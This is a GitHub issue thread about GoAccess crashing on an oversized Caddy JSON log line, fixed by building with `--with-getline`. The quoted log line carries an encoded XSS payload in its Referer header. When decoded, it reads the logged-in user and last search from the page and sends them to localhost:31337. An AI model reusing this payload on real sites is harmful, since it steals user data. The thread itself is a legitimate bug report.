### ISSUE TITLE
Segfault caused by extra-long line from Caddy JSON log

### ISSUE THREAD

**Issue by jensenhwa** [allinurl/goaccess#2037]
The following line in my Caddy log appears to cause GoAccess to segfault:
```json
{"level":"error","ts":1614020651.3063405,"logger":"http.log.access.log3","msg":"handled request","request":{"remote_addr":"11.111.11.11:59694","proto":"HTTP/2.0","method":"GET","host":"exampleaaaaaaaa.com","uri":"/0","headers":{"Referer":["https://exampleaaaaaaaa.com/search?q=%3Cvideo+src%3D0+onerror%3D%26%23x77%26%23x69%26%23x6e%26%23x64%26%23x6f%26%23x77%26%23x2e%26%23x6f%26%23x6e%26%23x6c%26%23x6f%26%23x61%26%23x64%26%23x20%26%23x3d%26%23x20%26%23x28%26%23x29%26%23x20%26%23x3d%26%23x3e%26%23x20%26%23x7b%26%23x6c%26%23x65%26%23x74%26%23x20%26%23x73%26%23x74%26%23x6f%26%23x6c%26%23x65%26%23x6e%26%23x5f%26%23x75%26%23x73%26%23x65%26%23x72%26%23x20%26%23x3d%26%23x20%26%23x64%26%23x6f%26%23x63%26%23x75%26%23x6d%26%23x65%26%23x6e%26%23x74%26%23x2e%26%23x67%26%23x65%26%23x74%26%23x45%26%23x6c%26%23x65%26%23x6d%26%23x65%26%23x6e%26%23x74%26%23x42%26%23x79%26%23x49%26%23x64%26%23x28%26%23x27%26%23x6c%26%23x6f%26%23x67%26%23x67%26%23x65%26%23x64%26%23x2d%26%23x69%26%23x6e%26%23x2d%26%23x75%26%23x73%26%23x65%26%23x72%26%23x27%26%23x29%26%23x2e%26%23x69%26%23x6e%26%23x6e%26%23x65%26%23x72%26%23x54%26%23x65%26%23x78%26%23x74%26%23x3b%26%23x6c%26%23x65%26%23x74%26%23x20%26%23x6c%26%23x61%26%23x73%26%23x74%26%23x5f%26%23x73%26%23x65%26%23x61%26%23x72%26%23x63%26%23x68%26%23x20%26%23x3d%26%23x20%26%23x64%26%23x6f%26%23x63%26%23x75%26%23x6d%26%23x65%26%23x6e%26%23x74%26%23x2e%26%23x67%26%23x65%26%23x74%26%23x45%26%23x6c%26%23x65%26%23x6d%26%23x65%26%23x6e%26%23x74%26%23x73%26%23x42%26%23x79%26%23x43%26%23x6c%26%23x61%26%23x73%26%23x73%26%23x4e%26%23x61%26%23x6d%26%23x65%26%23x28%26%23x27%26%23x68%26%23x69%26%23x73%26%23x74%26%23x6f%26%23x72%26%23x79%26%23x2d%26%23x69%26%23x74%26%23x65%26%23x6d%26%23x27%26%23x29%26%23x5b%26%23x31%26%23x5d%26%23x2e%26%23x69%26%23x6e%26%23x6e%26%23x65%26%23x72%26%23x54%26%23x65%26%23x78%26%23x74%26%23x3b%26%23x6c%26%23x65%26%23x74%26%23x20%26%23x65%26%23x20%26%23x3d%26%23x20%26%23x64%26%23x6f%26%23x63%26%23x75%26%23x6d%26%23x65%26%23x6e%26%23x74%26%23x2e%26%23x63%26%23x72%26%23x65%26%23x61%26%23x74%26%23x65%26%23x45%26%23x6c%26%23x65%26%23x6d%26%23x65%26%23x6e%26%23x74%26%23x28%26%23x27%26%23x69%26%23x6d%26%23x67%26%23x27%26%23x29%26%23x3b%26%23x65%26%23x2e%26%23x73%26%23x65%26%23x74%26%23x41%26%23x74%26%23x74%26%23x72%26%23x69%26%23x62%26%23x75%26%23x74%26%23x65%26%23x28%26%23x27%26%23x73%26%23x72%26%23x63%26%23x27%26%23x2c%26%23x20%26%23x60%26%23x68%26%23x74%26%23x74%26%23x70%26%23x3a%26%23x2f%26%23x2f%26%23x6c%26%23x6f%26%23x63%26%23x61%26%23x6c%26%23x68%26%23x6f%26%23x73%26%23x74%26%23x3a%26%23x33%26%23x31%26%23x33%26%23x33%26%23x37%26%23x2f%26%23x3f%26%23x73%26%23x74%26%23x6f%26%23x6c%26%23x65%26%23x6e%26%23x5f%26%23x75%26%23x73%26%23x65%26%23x72%26%23x3d%26%23x24%26%23x7b%26%23x73%26%23x74%26%23x6f%26%23x6c%26%23x65%26%23x6e%26%23x5f%26%23x75%26%23x73%26%23x65%26%23x72%26%23x7d%26%23x26%26%23x6c%26%23x61%26%23x73%26%23x74%26%23x5f%26%23x73%26%23x65%26%23x61%26%23x72%26%23x63%26%23x68%26%23x3d%26%23x24%26%23x7b%26%23x6c%26%23x61%26%23x73%26%23x74%26%23x5f%26%23x73%26%23x65%26%23x61%26%23x72%26%23x63%26%23x68%26%23x7d%26%23x60%26%23x29%26%23x3b%26%23x64%26%23x6f%26%23x63%26%23x75%26%23x6d%26%23x65%26%23x6e%26%23x74%26%23x2e%26%23x67%26%23x65%26%23x74%26%23x45%26%23x6c%26%23x65%26%23x6d%26%23x65%26%23x6e%26%23x74%26%23x42%26%23x79%26%23x49%26%23x64%26%23x28%26%23x27%26%23x73%26%23x65%26%23x61%26%23x72%26%23x63%26%23x68%26%23x63%26%23x6f%26%23x6e%26%23x74%26%23x72%26%23x6f%26%23x6c%26%23x27%26%23x29%26%23x2e%26%23x61%26%23x70%26%23x70%26%23x65%26%23x6e%26%23x64%26%23x43%26%23x68%26%23x69%26%23x6c%26%23x64%26%23x28%26%23x65%26%23x29%26%23x3b%26%23x7d%3E%3C%2Fvideo%3E"],"Cookie":["xssdefense=3; csrfdefense=0; authuser=\"!t+lODffxjnssycOspdlRug==?gAWVFwAAAAAAAACMCGF1dGh1c2VylIwGYWJjZGVmlIaULg==\""],"Te":["trailers"],"User-Agent":["Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"],"Accept":["video/webm,video/ogg,video/*;q=0.9,application/ogg;q=0.7,audio/*;q=0.6,*/*;q=0.5"],"Accept-Language":["en-US,en;q=0.5"],"Range":["bytes=0-"]},"tls":{"resumed":true,"version":772,"cipher_suite":4865,"proto":"h2","proto_mutual":true,"server_name":"exampleaaaaaaaa.com"}},"common_log":"11.111.11.11 - - [22/Feb/2021:19:04:11 +0000] \"GET /0 HTTP/2.0\" 404 729","duration":0.001380459,"size":729,"status":404,"resp_headers":{"Server":["Caddy","gunicorn/20.0.4"],"Strict-Transport-Security":["max-age=31536000; includeSubDomains; preload"],"Content-Type":["text/html; charset=UTF-8"],"Date":["Mon, 22 Feb 2021 19:04:11 GMT"],"Content-Length":["729"]}}
```
(randomized hostname and IP only)

It produces the following error:
```console
$ /usr/bin/goaccess -o ~/out.html --log-format CADDY ~/test.log
 [SETTING UP STORAGE /home/hwaj/test.log] {0} @ {0/s}
==22266== GoAccess 1.4.5 crashed by Sig 11
==22266==
==22266== VALUES AT CRASH POINT
==22266==
==22266== FILE: /home/hwaj/test.log
==22266== Line number: 1
==22266== Invalid data: 1
==22266== Piping: 0
==22266==
==22266== STACK TRACE:
==22266==
==22266== 0 /usr/bin/goaccess(sigsegv_handler+0x1ae) [0x559b62eab17e]
==22266== 1 /lib/x86_64-linux-gnu/libpthread.so.0(+0x153c0) [0x7fd1a3c373c0]
==22266== 2 /usr/bin/goaccess(+0x206b6) [0x559b62eb26b6]
==22266== 3 /usr/bin/goaccess(+0x37e50) [0x559b62ec9e50]
==22266== 4 /usr/bin/goaccess(parse_json_string+0x21b) [0x559b62ece9cb]
==22266== 5 /usr/bin/goaccess(pre_process_log+0x2ba) [0x559b62eca83a]
==22266== 6 /usr/bin/goaccess(+0x39171) [0x559b62ecb171]
==22266== 7 /usr/bin/goaccess(parse_log+0xde) [0x559b62ecb78e]
==22266== 8 /usr/bin/goaccess(main+0x2ad) [0x559b62ea5cbd]
==22266== 9 /lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf3) [0x7fd1a3a550b3]
==22266== 10 /usr/bin/goaccess(_start+0x2e) [0x559b62ea79ae]
==22266==
==22266== Please report it by opening an issue on GitHub:
==22266== https://github.com/allinurl/goaccess/issues

Segmentation fault (core dumped)
```
It appears to have something to do with the length of the message. When I remove a couple characters, the error becomes `Format Errors - Verify your log/date/time format` without a segfault.

I realize this is somewhat similar to #2018, but not completely identical.

Using Caddy v2.3.0 with default formatting, here is the Caddyfile snippet:
```
log {
    output file /var/log/caddy/access.log {
      roll_size 500mb
      roll_keep 5
      roll_keep_for 180d
    }
  }
```

Let me know if you need more info. Thanks.

**Comment by allinurl** [comment]
Thanks a lot for reporting this. The segfault appears to be related to #2018 which has been released only upstream. The next release, which includes this fix will be pushed out soon. However, for some reason I missed adding the `%R` specifier to the pre-defined Caddy JSON format. I just pushed a [commit](https://github.com/allinurl/goaccess/commit/5cc06a315133a1be76ab2f3be64fae3cbf2690cf) that adds this.

Now as far as the length. GoAccess has two options for line length, by defaults it truncates a line to 4096, if you expect lines longer than that, you will need to build using `--with-getline`. e.g.,

    $ ./configure --enable-utf8 --enable-geoip=mmdb --with-getline

Can I ask you to please verify that this addresses the issue on your end?

```
$ git clone https://github.com/allinurl/goaccess.git
$ cd goaccess
$ autoreconf -fiv
$ ./configure --enable-utf8 --enable-geoip=mmdb --with-getline --with-openssl
$ make
# make install
```

Let me know how it goes, thanks!

**Comment by jensenhwa** [comment]
Tested with the latest github code as you instructed, works flawlessly. I gather `--with-getline` is not enabled in the official Ubuntu repository? That would explain.

Thanks for proactively adding the referrer specifier.

**Comment by allinurl** [comment]
Great to hear that fixed the issue.

You're right, it's not in the deb repo, however, now that JSON format is supported, I think it would make sense to build the binary as such. Let me run some additional tests before the next release and if it all goes well, I'll make sure to use `--with-getline`. Stay tuned for the [release notes.](https://goaccess.io/release-notes).

Thank again!
